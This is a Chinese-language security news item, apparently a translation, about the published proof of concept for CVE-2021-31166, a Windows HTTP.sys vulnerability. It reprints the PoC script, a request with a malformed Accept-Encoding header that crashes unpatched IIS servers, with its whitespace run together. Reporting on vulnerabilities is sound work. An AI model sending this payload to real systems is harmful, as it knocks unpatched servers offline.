5月微软补丁日修复严重安全漏洞,CVSSv3评分9.8。该漏洞的CVE编号为CVE-2021-31166。近日,有研究人员在GitHub上公布了该漏洞的PoC代码。CVE-2021-31166漏洞是Windows操作系统中HTTP协议栈内存损坏漏洞。Windows内置IIS服务器使用此协议栈。如果启用IIS服务器,攻击者可以发送伪造的数据包在操作系统内核上执行代码。微软表示该漏洞可能被用来制造网络蠕虫,因此建议先修复它。虽然该漏洞的CVSS评分为9.8分,听起来很危险,但该漏洞只影响部分最新的Windows版本,具体影响Windows10、Windowsserver2004、Windowsserver20H2等不同版本。5月17日,安全研究员AxelSouchet在GitHub上公开了该漏洞的PoC代码。PoC代码使运行IIS服务器的未打补丁的Windows系统崩溃,但没有实现蠕虫功能。请参阅PoC代码:https://github.com/0vercl0k/CVE-2021-31166importrequestsimportargparsedefmain():parser=argparse.ArgumentParser('PocforCVE-2021-31166:remoteUAFinHTTP.sys')parser.add_argument('--target',required=True)args=parser.parse_args()r=requests.get(f'http://{args.target}/',headers={'Accept-Encoding':'doar-e,ftw,imo,,',})print(r)PoC视频见:https://github.com/0vercl0k/CVE-2021-31166/blob/main/pics/trigger.gif本文翻译自:https://therecord。media/poc-released-for-wormable-windows-iis-bug/如有转载请注明出处。
